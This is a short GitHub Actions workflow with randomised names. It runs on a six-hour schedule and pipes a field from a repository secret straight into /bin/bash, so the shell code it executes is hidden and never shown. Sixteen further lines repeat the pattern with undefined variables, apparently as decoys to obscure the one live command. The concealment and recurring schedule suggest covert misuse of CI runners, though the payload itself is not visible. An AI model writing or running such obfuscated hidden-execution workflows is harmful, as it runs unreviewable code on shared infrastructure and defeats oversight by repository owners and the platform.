name: luoyuzhe6712
on:
  workflow_dispatch:
  schedule:
    - cron: '14 3/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: luoyuzhe6712
        env:
          z6686: ${{ secrets.z6686 }}
        run: |
          echo $z6686 | jq -r .p6 | /bin/bash
          echo $xwv913 | jq -r .srovv7 | /bin/bash
          echo $dfy64 | jq -r .kyhay4 | /bin/bash
          echo $pr5 | jq -r .uiez040 | /bin/bash
          echo $ev65 | jq -r .fyu71401 | /bin/bash
          echo $lbvg43 | jq -r .fphtd06 | /bin/bash
          echo $syq1 | jq -r .l928 | /bin/bash
          echo $cywb3 | jq -r .fe06 | /bin/bash
          echo $d19569 | jq -r .ix1 | /bin/bash
          echo $eucjj5 | jq -r .tuu1238 | /bin/bash
          echo $briif77 | jq -r .n6 | /bin/bash
          echo $nyi0790 | jq -r .pzhrk67844 | /bin/bash
          echo $w84440 | jq -r .sc0 | /bin/bash
          echo $gwdje530 | jq -r .jyyxg98662 | /bin/bash
          echo $zj1 | jq -r .zcgxf92 | /bin/bash
          echo $vh1 | jq -r .yh05 | /bin/bash
          echo $v4 | jq -r .gzayd971 | /bin/bash

